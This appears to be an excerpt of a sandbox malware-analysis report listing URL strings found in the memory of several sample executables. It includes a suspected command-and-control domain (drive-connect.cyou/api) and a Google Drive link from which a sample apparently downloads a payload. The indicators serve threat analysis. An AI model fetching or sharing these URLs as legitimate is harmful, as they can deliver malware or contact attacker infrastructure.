Source: b1dc05533c.exe, 00000014.00000002.269672784820.0000000001245000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-connect.cyou/E
Source: b1dc05533c.exe, 00000014.00000002.269672784820.0000000001257000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-connect.cyou/L
Source: b1dc05533c.exe, 00000014.00000002.269672784820.0000000001257000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-connect.cyou/T
Source: b1dc05533c.exe, 00000014.00000002.269672784820.0000000001257000.00000004.00000020.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269581333238.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269581682088.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269665744703.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269620341236.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269672784820.000000000122D000.00000004.00000020.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269597691521.00000000012DF000.00000004.00000020.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269582254227.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269597245823.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269582406764.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269585020635.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269624485698.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269583843534.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269675144701.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269569320585.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269602098460.00000000039E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-connect.cyou/api
Source: b1dc05533c.exe, 00000014.00000003.269665744703.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269620341236.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269624485698.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269675144701.00000000039E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-connect.cyou/api#
Source: b1dc05533c.exe, 00000014.00000003.269581642475.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269621268757.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269674961163.00000000039C3000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269603996511.00000000039CB000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269585250102.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269598023150.00000000039C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-connect.cyou/api7
Source: b1dc05533c.exe, 00000014.00000003.269665744703.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269672784820.000000000122D000.00000004.00000020.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269624485698.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269675144701.00000000039E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-connect.cyou/api8
Source: b1dc05533c.exe, 00000014.00000003.269665744703.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269620341236.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269624485698.00000000039DA000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269675144701.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269569320585.00000000039E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-connect.cyou/apiG
Source: b1dc05533c.exe, 00000014.00000003.269665744703.00000000039E2000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269675144701.00000000039E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-connect.cyou/apiN
Source: b1dc05533c.exe, 00000014.00000003.269555366509.00000000012D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-connect.cyou/apiX
Source: b1dc05533c.exe, 00000014.00000003.269621268757.00000000039CA000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000002.269674961163.00000000039C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-connect.cyou/apib
Source: b1dc05533c.exe, 00000014.00000002.269674961163.00000000039C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-connect.cyou/apie
Source: b1dc05533c.exe, 00000014.00000002.269674961163.00000000039C3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-connect.cyou/apipJ/
Source: b1dc05533c.exe, 00000014.00000003.269597691521.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-connect.cyou/apiy
Source: b1dc05533c.exe, 00000014.00000002.269672784820.0000000001245000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-connect.cyou/m
Source: b1dc05533c.exe, 00000014.00000002.269674961163.00000000039C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-connect.cyou:443/apiicrosoft
Source: t5abhIx.exe, 0000002B.00000003.269665469215.000001B3EE8C5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665658896.000001B3EE8C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-0.corp.g
Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-0.corp.google.com/
Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-1.corp.google.com/
Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-2.corp.google.com/
Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-3.corp.google.com/
Source: dwVrTdy.exe, 00000026.00000003.269575949118.000002243262B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575302125.0000022432627000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575735102.000002243262A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-4.corp.goog
Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-4.corp.google.com/
Source: dwVrTdy.exe, 00000028.00000003.269593674669.00000256355F2000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593953212.00000256355F5000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000002.269664887145.00000256355E6000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269594381110.00000256355F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-5.corp
Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-6.corp.google.com/
Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive-staging.corp.google.com/
Source: dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595708496.000002563567A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google-
Source: t5abhIx.exe, 0000002B.00000003.269667407590.000001B3EE927000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664399362.000001B3EE8CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: dwVrTdy.exe, 00000028.00000003.269595629729.0000025635684000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/$&
Source: dwVrTdy.exe, 00000026.00000002.269640823894.000002243263F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/)
Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?usp=chrome_app
Source: dwVrTdy.exe, 00000028.00000003.269593674669.00000256355F2000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269594516522.0000025635613000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593756240.000002563560F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593816907.0000025635612000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?usp=chrome_app$
Source: t5abhIx.exe, 0000002B.00000003.269665658896.000001B3EE8C9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666742816.000001B3EE8D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?usp=chrome_app16B86B2
Source: AzVRM7c.exe, 00000029.00000003.269622635511.00000247ADF4E000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622388301.00000247ADF3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?usp=chrome_app891A5BF2880
Source: AzVRM7c.exe, 00000029.00000003.269620144384.00000247ADECC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?usp=chrome_appB
Source: dwVrTdy.exe, 00000026.00000003.269575586601.0000022432649000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576905982.000002243264E000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576407552.0000022432649000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576867431.000002243264B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575988391.0000022432649000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?usp=chrome_appC86DD1F748C
Source: AzVRM7c.exe, 00000029.00000003.269620857986.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620990445.00000247ADECF000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621355263.00000247ADED7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?usp=chrome_apprxn
Source: dwVrTdy.exe, 00000026.00000003.269575302125.0000022432627000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575586601.000002243263F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575367638.0000022432639000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?usp=chrome_appym
Source: AzVRM7c.exe, 00000029.00000003.269621589022.00000247ADEC9000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622941363.00000247ADECC000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621498842.00000247ADEB9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/H
Source: dwVrTdy.exe, 00000026.00000003.269574758482.0000022432652000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/U5
Source: dwVrTdy.exe, 00000026.00000003.269575302125.0000022432627000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/sett)W~
Source: dwVrTdy.exe, 00000026.00000003.269575949118.000002243262B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575735102.000002243262A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/settC
Source: t5abhIx.exe, 0000002B.00000003.269665082563.000001B3EE919000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665658896.000001B3EE8C9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665572717.000001B3EE8E2000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666742816.000001B3EE8D4000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/settings
Source: dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595708496.000002563567A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/settings0A80DFEA
Source: dwVrTdy.exe, 00000028.00000003.269592961408.0000025635608000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/settings8
Source: dwVrTdy.exe, 00000026.00000003.269575586601.0000022432649000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576905982.000002243264E000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576407552.0000022432649000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576867431.000002243264B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575988391.0000022432649000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/settings8ECA8A0F77F0
Source: AzVRM7c.exe, 00000029.00000003.269622635511.00000247ADF4E000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622388301.00000247ADF3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/settings9E35DD14
Source: t5abhIx.exe, 0000002B.00000003.269665658896.000001B3EE8C9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666742816.000001B3EE8D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/settingsFA82C2BF0FBE
Source: AzVRM7c.exe, 00000029.00000003.269620857986.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620990445.00000247ADECF000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621355263.00000247ADED7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/settingsV
Source: t5abhIx.exe, 0000002B.00000003.269665781497.000001B3EE8E8000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665572717.000001B3EE8E2000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/settingsXn
Source: AzVRM7c.exe, 00000029.00000003.269620144384.00000247ADECC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/settingscrxv
Source: dwVrTdy.exe, 00000026.00000002.269640823894.000002243263F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/e
Source: AzVRM7c.exe, 00000029.00000003.269621182033.00000247ADF03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/eo
Source: AzVRM7c.exe, 00000029.00000003.269621182033.00000247ADF03000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269619838474.00000247ADEFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/j
Source: t5abhIx.exe, 0000002B.00000003.269665469215.000001B3EE8C5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665658896.000001B3EE8C9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666253189.000001B3EE8D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/keP_=
Source: dwVrTdy.exe, 00000026.00000000.269552412414.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000026.00000002.269642733373.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000002.269666668507.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000000.269569842082.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, AzVRM7c.exe, 00000029.00000002.269642585095.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, AzVRM7c.exe, 00000029.00000000.269596958142.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, t5abhIx.exe, 0000002B.00000000.269642377943.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp	String found in binary or memory: https://drive.google.com/uc?id=
Source: dwVrTdy.exe, 00000028.00000003.269647087096.00000256355FD000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269646928475.0000025635678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
Source: dwVrTdy.exe, 00000028.00000002.269664887145.00000256355C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download$
Source: dwVrTdy.exe, 00000028.00000003.269648294839.000002563562B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654360187.0000025635629000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000002.269664887145.0000025635629000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269647448956.000002563562B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download6
Source: dwVrTdy.exe, 00000028.00000003.269646928475.0000025635678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadChrome
Source: dwVrTdy.exe, 00000028.00000002.269664887145.0000025635668000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654227806.0000025635676000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269646928475.0000025635678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadJ6
Source: dwVrTdy.exe, 00000028.00000002.269664887145.00000256355E6000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654360187.00000256355FD000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269647087096.00000256355FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download_
Source: dwVrTdy.exe, 00000026.00000003.269622533253.00000224326C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadd
Source: dwVrTdy.exe, 00000028.00000002.269666025995.0000025636270000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269647817237.0000025636294000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269648674798.0000025636294000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadom
Source: dwVrTdy.exe, 00000026.00000002.269640823894.00000224326C6000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269622533253.00000224326C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download~
Source: dwVrTdy.exe, 00000026.00000000.269552412414.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000026.00000002.269642733373.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000002.269666668507.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000000.269569842082.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, AzVRM7c.exe, 00000029.00000002.269642585095.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, AzVRM7c.exe, 00000029.00000000.269596958142.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, t5abhIx.exe, 0000002B.00000000.269642377943.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp	String found in binary or memory: https://drive.google.com/uc?id=URL:
Source: dwVrTdy.exe, 00000028.00000003.269648294839.000002563562B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654360187.0000025635629000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000002.269664887145.0000025635629000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269647448956.000002563562B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/x
Source: dwVrTdy.exe, 00000026.00000003.269574954679.0000022432670000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.0000022432670000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/y#
Source: dwVrTdy.exe, 00000028.00000003.269646928475.0000025635678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: dwVrTdy.exe, 00000028.00000002.269664887145.0000025635668000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654227806.0000025635676000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269646928475.0000025635678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/61
Source: dwVrTdy.exe, 00000028.00000003.269646928475.0000025635692000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269647817237.0000025636294000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269646928475.0000025635689000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654227806.0000025635692000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000002.269664887145.0000025635692000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269648674798.0000025636294000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download
Source: dwVrTdy.exe, 00000026.00000002.269640823894.0000022432659000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269622533253.000002243266F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download-
Source: dwVrTdy.exe, 00000026.00000002.269641953537.000002243431F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=download8b
Source: dwVrTdy.exe, 00000028.00000003.269646928475.0000025635692000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f&export=downloadF
Source: dwVrTdy.exe, 00000028.00000002.269664887145.0000025635668000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654227806.0000025635676000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269646928475.0000025635678000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/x1
Source: b1dc05533c.exe, 00000014.00000003.269570020702.00000000039F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: b1dc05533c.exe, 00000014.00000003.269557138007.0000000003A2A000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269570364935.0000000003BDC000.00000004.00000800.00020000.00000000.sdmp, b1dc05533c.exe, 00000014.00000003.269570020702.00000000039F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: b1dc05533c.exe, 00000014.00000003.269570020702.00000000039F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: b1dc05533c.exe, 00000014.00000003.269557138007.0000000003A2A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: LoaderClient.exe, 0000002F.00000002.269881633471.00000178EAAA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://gist.github.com/lyssdod/f51579ae8d93c8657a5564aefc2ffbca
Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/astral-sh/ruff
Source: LoaderClient.exe, 0000002F.00000002.269881633471.00000178EAAA0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/jaraco/jaraco.functools/issues/5
Source: LoaderClient.exe, 0000002E.00000003.269796231674.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269798029799.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269801549924.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269785646619.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269802137570.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269801841133.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269801841133.0000023A40635000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269895531489.00007FFBBB6A4000.00000002.00000001.01000000.00000022.sdmp	String found in binary or memory: https://github.com/mhammond/pywin32
Source: LoaderClient.exe, 0000002E.00000003.269805743524.0000023A4062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/.github/blob/main/CODE_OF_CONDUCT.md
Source: LoaderClient.exe, 0000002E.00000003.269805743524.0000023A4062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/wheel
Source: LoaderClient.exe, 0000002E.00000003.269805743524.0000023A4062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pypa/wheel/issues
Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/importlib_metadata
Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/importlib_metadata/actions/workflows/main.yml/badge.svg
Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/importlib_metadata/actions?query=workflow%3A%22tests%22
Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/importlib_metadata/issues
